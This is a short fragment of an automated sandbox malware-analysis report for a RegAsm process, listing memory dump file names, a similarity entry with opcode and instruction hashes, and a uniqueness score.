                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %z%s%z
                                                                                                                                                                                                                                        • API String ID: 0-3434679432
                                                                                                                                                                                                                                        • Opcode ID: 00ef3a7eb0f36145eab62661b1be66f082a6bec7b77a8de506201000108e99b8
                                                                                                                                                                                                                                        • Instruction ID: 0fe8d989686f3450f9d7a91df130c1fcd5d7d53739617c6b8b889052e4f37a7c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00ef3a7eb0f36145eab62661b1be66f082a6bec7b77a8de506201000108e99b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF0E2B0600702CFEB108B11D801767B3E8FF94204F8C592DEC86C2940EB31FC449B51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%